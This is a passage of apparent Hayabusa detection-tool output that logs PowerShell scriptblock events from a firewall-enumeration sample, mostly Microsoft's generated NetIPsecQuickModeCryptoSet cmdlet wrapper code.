[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletiza",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 